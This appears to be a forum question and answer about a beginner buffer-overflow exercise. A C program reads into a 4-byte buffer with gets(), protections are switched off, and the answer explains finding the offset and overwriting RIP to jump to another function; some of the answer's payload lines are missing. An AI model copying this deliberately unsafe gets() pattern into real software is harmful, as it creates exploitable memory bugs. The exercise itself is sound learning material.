I tern off the ASLR and tern of the gcc stack protector.
And I wrote C vulnerable code and I tried to overflow the buffer so I check how many character need for the crash. And I tried to change the return address , to another function but I got a message:
Segmentation fault (core dumped)
This is my C code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void sss()
{
printf("good by");
}
void scriptpy(){
printf("hello world\n");
}
int main(int argc , char** argv)
{
char buf[4];
gets(buf);
return 0;
}
I found the address of the "sss" function and i tried to insert the hex value .
This is my address:
(gdb) disas sss
Dump of assembler code for function sss:
0x00000000000006ca <+0>: push %rbp
To edit the return address i insert:
printf "AAAABBBBB/xe2/x06/x00/x00/x00/x00/x00/x00" | ./cTutorial
Let's suppose that the binary is compiled with the flag
-fno-stack-protectorand the ASLR is disabledecho 0 | sudo tee /proc/sys/kernel/randomize_va_space.Find the crash:
The program start crashing with payload of 12 characters:
Controlling RIP
Using GDB to find the offset that overwrite RIP, we can find that the first byte of RIP can be overwritten with 0x41 ('A') with a payload of 13 characters:
Note that RIP is overwritten with 0041 where
00is the null characters terminating the string.To control all bytes of RIP:
Let's suppose that the function
sssis located at the address0x0000555555555189.The final payload is:
Where 11 = 18 - (len('\x89\x51\x55\x55\x55\x55') + 1)
+1 for the null byte
The jump to the function
sssis taken. The program will crash after the jump to the functionsssas the stack will be corrupted.